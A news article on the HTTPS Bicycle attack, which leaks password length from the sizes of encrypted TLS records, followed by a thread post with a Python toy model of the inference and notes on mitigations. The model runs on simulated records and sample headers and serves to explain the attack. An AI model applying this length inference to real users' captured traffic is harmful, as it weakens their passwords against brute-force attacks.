How long is your password? HTTPS Bicycle attack reveals that and more
#1
A new attack on supposedly secure communication streams raises questions over the resilience of passwords, security researchers warn.
The HTTPS Bicycle attack can result in the length of personal and secret data, such as passwords and GPS co-ordinates, being exposed from a packet capture of a user's HTTPS traffic.
The attack – discovered by security researcher Guido Vranken (and summarised below) – refocuses attention on topics such as encryption, authentication, privacy and most specifically password security.
It is usually assumed that HTTP traffic encapsulated in TLS doesn’t reveal the exact sizes of its parts, such as the length of a cookie header, or the payload of a HTTP POST request that may contain variable-length credentials such as passwords. In this paper I show that the redundancy of the plaintext HTTP headers included in each and every request can be exploited in order to reveal the length of particular components (such as passwords) of particular requests (such as authentication to a web application).
The redundancy of HTTP in practice allows for an iterative resolution of the length of ‘unknowns’ in a HTTP message until the lengths of all its components are known except for a coveted secret, such as a password, whose length is then implied. The attack furthermore exploits the property of stream-oriented cipher suites such as those based on Galois/Counter Mode that the exact size of the plaintext can be known to a man-in-the-middle.
Carl Leonard, principal security analyst at security tools firm Raytheon|Websense, commented: “End users may expect their passwords to remain secret when they interact with a website that uses encryption, but HTTPS Bicycle shows this may not be the case. Knowledge is power to an attacker, and even small pieces of information can lead to a later, more refined attack.”
Determining even the length of a password can narrow down the range of possibilities and therefore make subsequent brute force assaults more effective, continued Leonard: "The undetectable nature of this attack means it's vital that webmasters consider using strong passwords and two-factor authentication to eliminate the single point of failure. End users must ensure their passwords are sufficiently strong, while website operators and web platform developers must ensure they are fully up to date to guarantee all steps are taken to prevent this attack from occurring in the future."

SOURCE
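The two-step bookkeeping the post describes (resolve the length of the browser's fixed headers from one request, then subtract every known part of the login POST until only the password remains), as an added example written for this thread. It is not code from Vranken's paper or from the article; the header values, the username "alice", the /login path and the form field names are all constructed samples, and the record overhead modelled is that of a TLS 1.2 AES-GCM cipher suite (5-byte record header, 8-byte explicit nonce, 16-byte tag, no padding).

```python
# Toy model of the HTTPS Bicycle length inference, written for this post.
# Not code from Vranken's paper; every header value below is a constructed sample.

# TLS 1.2 AES-GCM record layout (RFC 5246 + RFC 5288): no padding, so the
# ciphertext is exactly as long as the plaintext and only fixed overhead is added.
TLS_RECORD_HEADER = 5      # content type (1) + version (2) + length (2)
GCM_EXPLICIT_NONCE = 8     # per-record explicit nonce sent in the clear
GCM_TAG = 16               # authentication tag

# Headers the victim's browser sends identically on every request in the
# session (constructed).  The attacker does NOT need to know their values,
# only that they are the same from one request to the next.
FIXED_HEADERS = [
    "Host: login.example.com",
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0",
    "Accept: text/html,application/xhtml+xml",
    "Cookie: session=3f9a1c7e0b2d4e5f6a7b8c9d0e1f2a3b",
    "Connection: keep-alive",
]

CRLF = "\r\n"


def build_get(path: str) -> bytes:
    """Victim side: a plain GET for a page the attacker can identify."""
    lines = [f"GET {path} HTTP/1.1", *FIXED_HEADERS]
    return (CRLF.join(lines) + CRLF + CRLF).encode()


def build_login_post(username: str, password: str) -> bytes:
    """Victim side: the form login whose password length we want to recover."""
    body = f"user={username}&pass={password}"
    lines = [
        "POST /login HTTP/1.1",
        *FIXED_HEADERS,
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
    ]
    return (CRLF.join(lines) + CRLF + CRLF).encode() + body.encode()


def tls12_gcm_record_len(plaintext: bytes) -> int:
    """Bytes on the wire for one application-data record carrying `plaintext`."""
    return TLS_RECORD_HEADER + GCM_EXPLICIT_NONCE + len(plaintext) + GCM_TAG


def plaintext_len_from_record(record_len: int) -> int:
    """Attacker side: the GCM overhead is constant, so the plaintext length
    falls straight out of the record length seen in a packet capture."""
    return record_len - TLS_RECORD_HEADER - GCM_EXPLICIT_NONCE - GCM_TAG


def infer_fixed_header_len(get_record_len: int, known_path: str) -> int:
    """Step 1: a GET to a known path has only one unknown, the block of
    browser-fixed headers (cookie, UA, ...).  Subtracting the parts we can
    write down ourselves resolves its length, values still unseen."""
    request_line = f"GET {known_path} HTTP/1.1{CRLF}"
    return plaintext_len_from_record(get_record_len) - len(request_line) - len(CRLF)


def infer_password_len(post_record_len: int, fixed_header_len: int, username: str) -> list:
    """Step 2: in the login POST everything except the password is now known
    or computable.  Content-Length is itself a function of the body length,
    so we try each candidate password length and keep the self-consistent one."""
    total = plaintext_len_from_record(post_record_len)
    request_line = f"POST /login HTTP/1.1{CRLF}"
    content_type = f"Content-Type: application/x-www-form-urlencoded{CRLF}"
    body_prefix = f"user={username}&pass="
    hits = []
    for pw_len in range(0, 1024):
        body_len = len(body_prefix) + pw_len
        content_length = f"Content-Length: {body_len}{CRLF}"
        expected = (len(request_line) + fixed_header_len + len(content_type)
                    + len(content_length) + len(CRLF) + body_len)
        if expected == total:
            hits.append(pw_len)
    return hits


def demo(password: str = "correcthorsebatterystaple") -> list:
    """Simulate the capture of two records and run both inference steps.
    Returns the inferred password length(s); in this model the list holds
    exactly one entry, the true length."""
    get_record = tls12_gcm_record_len(build_get("/"))
    post_record = tls12_gcm_record_len(build_login_post("alice", password))
    fixed_len = infer_fixed_header_len(get_record, "/")
    return infer_password_len(post_record, fixed_len, "alice")


if __name__ == "__main__":
    print(demo())  # -> [25]
```

The attacker never decrypts anything: the only inputs are two record lengths from the capture and the request layout the attacker can reproduce. The same arithmetic gives only a 16-byte-granular answer against a CBC suite, because CBC pads to the block size, and TLS 1.3's optional record padding or HTTP/2 header compression breaks the fixed-header assumption that step 1 relies on; padding the credential field itself to a constant length removes the leak on the application side.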